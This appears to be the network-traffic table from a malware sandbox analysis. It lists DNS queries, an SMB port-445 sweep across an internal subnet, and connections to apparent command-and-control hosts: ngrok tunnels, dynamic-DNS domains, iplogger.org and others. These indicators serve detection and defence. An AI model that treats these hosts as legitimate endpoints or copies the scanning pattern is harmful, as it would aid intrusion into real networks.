| US | 8.8.8.8:53 | 5.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.43:445 | tcp | |
| US | 8.8.8.8:53 | 23.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.34:445 | tcp | |
| N/A | 10.127.255.1:445 | tcp | |
| N/A | 10.127.255.36:445 | tcp | |
| N/A | 10.127.255.57:445 | tcp | |
| N/A | 10.127.255.49:445 | tcp | |
| N/A | 10.127.255.55:445 | tcp | |
| N/A | 10.127.255.26:445 | tcp | |
| N/A | 10.127.255.35:445 | tcp | |
| N/A | 10.127.255.50:445 | tcp | |
| N/A | 10.127.255.25:445 | tcp | |
| US | 8.8.8.8:53 | 29.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.15:445 | tcp | |
| N/A | 10.127.255.52:445 | tcp | |
| N/A | 10.127.255.63:445 | tcp | |
| N/A | 10.127.255.58:445 | tcp | |
| N/A | 10.127.255.14:445 | tcp | |
| N/A | 10.127.255.31:445 | tcp | |
| N/A | 10.127.255.33:445 | tcp | |
| N/A | 10.127.255.20:445 | tcp | |
| N/A | 10.127.255.37:445 | tcp | |
| N/A | 10.127.255.54:445 | tcp | |
| N/A | 10.127.255.12:445 | tcp | |
| N/A | 10.127.255.18:445 | tcp | |
| N/A | 10.127.255.2:445 | tcp | |
| N/A | 10.127.255.5:445 | tcp | |
| N/A | 10.127.255.45:445 | tcp | |
| US | 107.178.223.183:443 | videoconvert-download38.xyz | tcp |
| N/A | 10.127.255.10:445 | tcp | |
| N/A | 10.127.255.13:445 | tcp | |
| N/A | 10.127.255.38:445 | tcp | |
| N/A | 10.127.255.48:445 | tcp | |
| N/A | 10.127.255.64:445 | tcp | |
| N/A | 10.127.255.0:445 | tcp | |
| N/A | 10.127.255.59:445 | tcp | |
| N/A | 10.127.255.8:445 | tcp | |
| N/A | 10.127.255.30:445 | tcp | |
| N/A | 10.127.255.23:445 | tcp | |
| N/A | 10.127.255.41:445 | tcp | |
| N/A | 10.127.255.29:445 | tcp | |
| N/A | 10.127.255.47:445 | tcp | |
| N/A | 10.127.255.19:445 | tcp | |
| N/A | 10.127.255.6:445 | tcp | |
| N/A | 10.127.255.53:445 | tcp | |
| N/A | 10.127.255.62:445 | tcp | |
| N/A | 10.127.255.7:445 | tcp | |
| N/A | 10.127.255.24:445 | tcp | |
| N/A | 10.127.255.21:445 | tcp | |
| N/A | 10.127.255.42:445 | tcp | |
| N/A | 10.127.255.28:445 | tcp | |
| N/A | 10.127.255.32:445 | tcp | |
| N/A | 10.127.255.44:445 | tcp | |
| N/A | 10.127.255.3:445 | tcp | |
| N/A | 10.127.255.61:445 | tcp | |
| N/A | 10.127.255.16:445 | tcp | |
| N/A | 10.127.255.39:445 | tcp | |
| N/A | 10.127.255.56:445 | tcp | |
| N/A | 10.127.255.71:445 | tcp | |
| N/A | 10.127.255.75:445 | tcp | |
| N/A | 10.127.255.93:445 | tcp | |
| N/A | 10.127.255.85:445 | tcp | |
| N/A | 10.127.255.17:445 | tcp | |
| N/A | 10.127.255.65:445 | tcp | |
| N/A | 10.127.255.66:445 | tcp | |
| N/A | 10.127.255.67:445 | tcp | |
| N/A | 10.127.255.91:445 | tcp | |
| N/A | 10.127.255.40:445 | tcp | |
| N/A | 10.127.255.96:445 | tcp | |
| US | 8.8.8.8:53 | 24.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.0.127.10.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.89:445 | tcp | |
| N/A | 10.127.255.4:445 | tcp | |
| N/A | 10.127.255.99:445 | tcp | |
| N/A | 10.127.255.121:445 | tcp | |
| N/A | 10.127.255.125:445 | tcp | |
| N/A | 10.127.255.82:445 | tcp | |
| N/A | 10.127.255.95:445 | tcp | |
| N/A | 10.127.255.124:445 | tcp | |
| N/A | 10.127.255.80:445 | tcp | |
| N/A | 10.127.255.81:445 | tcp | |
| N/A | 10.127.255.105:445 | tcp | |
| N/A | 10.127.255.11:445 | tcp | |
| N/A | 10.127.255.27:445 | tcp | |
| N/A | 10.127.255.22:445 | tcp | |
| N/A | 10.127.255.108:445 | tcp | |
| N/A | 10.127.255.119:445 | tcp | |
| N/A | 10.127.255.106:445 | tcp | |
| N/A | 10.127.255.107:445 | tcp | |
| N/A | 10.127.255.77:445 | tcp | |
| N/A | 10.127.255.116:445 | tcp | |
| N/A | 10.127.255.100:445 | tcp | |
| N/A | 10.127.255.115:445 | tcp | |
| N/A | 10.127.255.128:445 | tcp | |
| N/A | 10.127.255.110:445 | tcp | |
| N/A | 10.127.255.117:445 | tcp | |
| N/A | 10.127.255.122:445 | tcp | |
| N/A | 10.127.255.127:445 | tcp | |
| N/A | 10.127.255.130:445 | tcp | |
| US | 8.8.8.8:53 | 17.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.69:445 | tcp | |
| N/A | 10.127.255.84:445 | tcp | |
| N/A | 10.127.255.51:445 | tcp | |
| N/A | 10.127.255.76:445 | tcp | |
| N/A | 10.127.255.72:445 | tcp | |
| N/A | 10.127.255.79:445 | tcp | |
| N/A | 10.127.255.101:445 | tcp | |
| N/A | 10.127.255.68:445 | tcp | |
| N/A | 10.127.255.78:445 | tcp | |
| N/A | 10.127.255.109:445 | tcp | |
| N/A | 10.127.255.123:445 | tcp | |
| N/A | 10.127.255.104:445 | tcp | |
| N/A | 10.127.255.126:445 | tcp | |
| N/A | 10.127.255.87:445 | tcp | |
| N/A | 10.127.255.83:445 | tcp | |
| N/A | 10.127.255.92:445 | tcp | |
| N/A | 10.127.255.114:445 | tcp | |
| N/A | 10.127.255.86:445 | tcp | |
| N/A | 10.127.255.120:445 | tcp | |
| US | 8.8.8.8:53 | 21.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.131:445 | tcp | |
| N/A | 10.127.255.129:445 | tcp | |
| US | 8.8.8.8:53 | 43.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.102:445 | tcp | |
| N/A | 10.127.255.113:445 | tcp | |
| N/A | 10.127.255.70:445 | tcp | |
| N/A | 10.127.255.88:445 | tcp | |
| N/A | 10.127.255.97:445 | tcp | |
| N/A | 10.127.255.9:445 | tcp | |
| N/A | 10.127.255.94:445 | tcp | |
| N/A | 10.127.255.112:445 | tcp | |
| N/A | 10.127.255.60:445 | tcp | |
| N/A | 10.127.255.90:445 | tcp | |
| N/A | 10.127.255.98:445 | tcp | |
| N/A | 10.127.255.111:445 | tcp | |
| US | 8.8.8.8:53 | 39.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.74:445 | tcp | |
| N/A | 10.127.255.46:445 | tcp | |
| N/A | 10.127.255.103:445 | tcp | |
| N/A | 10.127.255.73:445 | tcp | |
| N/A | 10.127.255.118:445 | tcp | |
| US | 8.8.8.8:53 | 45.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.155:445 | tcp | |
| N/A | 10.127.255.217:445 | tcp | |
| N/A | 10.127.255.141:445 | tcp | |
| N/A | 10.127.255.206:445 | tcp | |
| N/A | 10.127.255.138:445 | tcp | |
| N/A | 10.127.255.149:445 | tcp | |
| N/A | 10.127.255.250:445 | tcp | |
| N/A | 10.127.255.227:445 | tcp | |
| N/A | 10.127.255.244:445 | tcp | |
| N/A | 10.127.255.226:445 | tcp | |
| N/A | 10.127.255.207:445 | tcp | |
| N/A | 10.127.255.215:445 | tcp | |
| N/A | 10.127.255.183:445 | tcp | |
| N/A | 10.127.255.193:445 | tcp | |
| N/A | 10.127.255.236:445 | tcp | |
| N/A | 10.127.255.208:445 | tcp | |
| N/A | 10.127.255.134:445 | tcp | |
| N/A | 10.127.255.225:445 | tcp | |
| N/A | 10.127.255.172:445 | tcp | |
| N/A | 10.127.255.202:445 | tcp | |
| US | 8.8.8.8:53 | 46.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.0.127.10.in-addr.arpa | udp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| N/A | 10.127.255.192:445 | tcp | |
| US | 8.8.8.8:53 | grene231.ddns.net | udp |
| N/A | 10.127.255.160:445 | tcp | |
| N/A | 10.127.255.150:445 | tcp | |
| US | 199.59.243.227:443 | telete.in | tcp |
| N/A | 10.127.255.165:445 | tcp | |
| N/A | 10.127.255.168:445 | tcp | |
| N/A | 10.127.255.171:445 | tcp | |
| N/A | 10.127.255.200:445 | tcp | |
| US | 8.8.8.8:53 | ibram.zapto.org | udp |
| N/A | 10.127.255.212:445 | tcp | |
| N/A | 10.127.255.184:445 | tcp | |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| N/A | 10.127.255.190:445 | tcp | |
| N/A | 10.127.255.213:445 | tcp | |
| N/A | 10.127.255.239:445 | tcp | |
| N/A | 10.127.255.178:445 | tcp | |
| N/A | 10.127.255.181:445 | tcp | |
| N/A | 10.127.255.180:445 | tcp | |
| N/A | 10.127.255.219:445 | tcp | |
| N/A | 10.127.255.173:445 | tcp | |
| N/A | 10.127.255.196:445 | tcp | |
| N/A | 10.127.255.197:445 | tcp | |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| N/A | 10.127.255.249:445 | tcp | |
| N/A | 10.127.255.254:445 | tcp | |
| N/A | 10.127.255.162:445 | tcp | |
| N/A | 10.127.255.191:445 | tcp | |
| N/A | 10.127.255.238:445 | tcp | |
| N/A | 10.127.255.164:445 | tcp | |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| N/A | 10.127.255.216:445 | tcp | |
| N/A | 10.127.255.218:445 | tcp | |
| N/A | 10.127.255.231:445 | tcp | |
| N/A | 10.127.255.179:445 | tcp | |
| N/A | 10.127.255.142:445 | tcp | |
| N/A | 10.127.255.194:445 | tcp | |
| N/A | 10.127.255.163:445 | tcp | |
| N/A | 10.127.255.230:445 | tcp | |
| N/A | 10.127.255.182:445 | tcp | |
| N/A | 10.127.255.187:445 | tcp | |
| N/A | 10.127.255.232:445 | tcp | |
| N/A | 10.127.255.157:445 | tcp | |
| N/A | 10.127.255.205:445 | tcp | |
| N/A | 10.127.255.158:445 | tcp | |
| N/A | 10.127.255.224:445 | tcp | |
| N/A | 10.127.255.145:445 | tcp | |
| N/A | 10.127.255.195:445 | tcp | |
| N/A | 10.127.255.140:445 | tcp | |
| N/A | 10.127.255.167:445 | tcp | |
| N/A | 10.127.255.229:445 | tcp | |
| N/A | 10.127.255.188:445 | tcp | |
| N/A | 10.127.255.136:445 | tcp | |
| N/A | 10.127.255.177:445 | tcp | |
| N/A | 10.127.255.148:445 | tcp | |
| N/A | 10.127.255.143:445 | tcp | |
| N/A | 10.127.255.153:445 | tcp | |
| N/A | 10.127.255.137:445 | tcp | |
| N/A | 10.127.255.246:445 | tcp | |
| N/A | 10.127.255.233:445 | tcp | |
| N/A | 10.127.255.210:445 | tcp | |
| N/A | 10.127.255.154:445 | tcp | |
| N/A | 10.127.255.135:445 | tcp | |
| N/A | 10.127.255.211:445 | tcp | |
| N/A | 10.127.255.241:445 | tcp | |
| N/A | 10.127.255.222:445 | tcp | |
| N/A | 10.127.255.139:445 | tcp | |
| N/A | 10.127.255.203:445 | tcp | |
| N/A | 10.127.255.186:445 | tcp | |
| N/A | 10.127.255.209:445 | tcp | |
| N/A | 10.127.255.204:445 | tcp | |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| N/A | 10.127.255.247:445 | tcp | |
| N/A | 10.127.255.221:445 | tcp | |
| N/A | 10.127.255.223:445 | tcp | |
| N/A | 10.127.255.201:445 | tcp | |
| N/A | 10.127.255.228:445 | tcp | |
| N/A | 10.127.255.151:445 | tcp | |
| N/A | 10.127.255.170:445 | tcp | |
| N/A | 10.127.255.176:445 | tcp | |
| N/A | 10.127.255.220:445 | tcp | |
| US | 8.8.8.8:53 | 35.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.240:445 | tcp | |
| N/A | 10.127.255.169:445 | tcp | |
| N/A | 10.127.255.185:445 | tcp | |
| N/A | 10.127.255.199:445 | tcp | |
| N/A | 10.127.255.237:445 | tcp | |
| N/A | 10.127.255.166:445 | tcp | |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| N/A | 10.127.255.234:445 | tcp | |
| N/A | 10.127.255.235:445 | tcp | |
| N/A | 10.127.255.214:445 | tcp | |
| N/A | 10.127.255.152:445 | tcp | |
| N/A | 10.127.255.161:445 | tcp | |
| N/A | 10.127.255.174:445 | tcp | |
| N/A | 10.127.255.133:445 | tcp | |
| N/A | 10.127.255.132:445 | tcp | |
| N/A | 10.127.255.198:445 | tcp | |
| N/A | 10.127.255.242:445 | tcp | |
| N/A | 10.127.255.146:445 | tcp | |
| N/A | 10.127.255.144:445 | tcp | |
| N/A | 10.127.255.159:445 | tcp | |
| N/A | 10.127.255.147:445 | tcp | |
| N/A | 10.127.255.175:445 | tcp | |
| N/A | 10.127.255.189:445 | tcp | |
| N/A | 10.127.255.156:445 | tcp | |
| N/A | 10.127.255.243:445 | tcp | |
| US | 8.8.8.8:53 | email.yg9.me | udp |
| US | 8.8.8.8:53 | email.yg9.me | udp |
| US | 8.8.8.8:53 | 30.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.253:445 | tcp | |
| N/A | 10.127.255.245:445 | tcp | |
| US | 8.8.8.8:53 | flestriche.xyz | udp |
| N/A | 10.127.255.251:445 | tcp | |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 8.8.8.8:53 | 62.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.248:445 | tcp | |
| US | 8.8.8.8:53 | 63.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.252:445 | tcp | |
| US | 8.8.8.8:53 | 58.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | 59.0.127.10.in-addr.arpa | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 102.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.0.127.10.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 111.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | uyg5wye.2ihsfa.com | udp |
| DE | 45.153.241.244:5506 | tcp | |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| FR | 134.119.181.15:3963 | tcp | |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | grene231.ddns.net | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 51.0.127.10.in-addr.arpa | udp |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 13.248.252.114:80 | uyg5wye.2ihsfa.com | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 8.8.8.8:53 | 49.0.127.10.in-addr.arpa | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 74.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.0.127.10.in-addr.arpa | udp |
| DE | 3.126.245.176:13337 | tcp | |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 95.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.0.127.10.in-addr.arpa | udp |
| US | 107.178.223.183:443 | videoconvert-download38.xyz | tcp |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | flestriche.xyz | udp |
| US | 8.8.8.8:53 | ibram.zapto.org | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 182.128.123.92.in-addr.arpa | udp |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | grene231.ddns.net | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| MX | 136.144.41.201:80 | tcp | |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.252.248.13.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | email.yg9.me | udp |
| US | 8.8.8.8:53 | email.yg9.me | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | flestriche.xyz | udp |
| US | 8.8.8.8:53 | 136.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grene231.ddns.net | udp |
| US | 8.8.8.8:53 | 140.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.0.127.10.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 148.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aammkk12345.kro.kr | udp |
| KR | 180.69.229.168:5552 | aammkk12345.kro.kr | tcp |
| RU | 176.111.174.254:56328 | tcp | |
| US | 8.8.8.8:53 | 235.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.0.127.10.in-addr.arpa | udp |
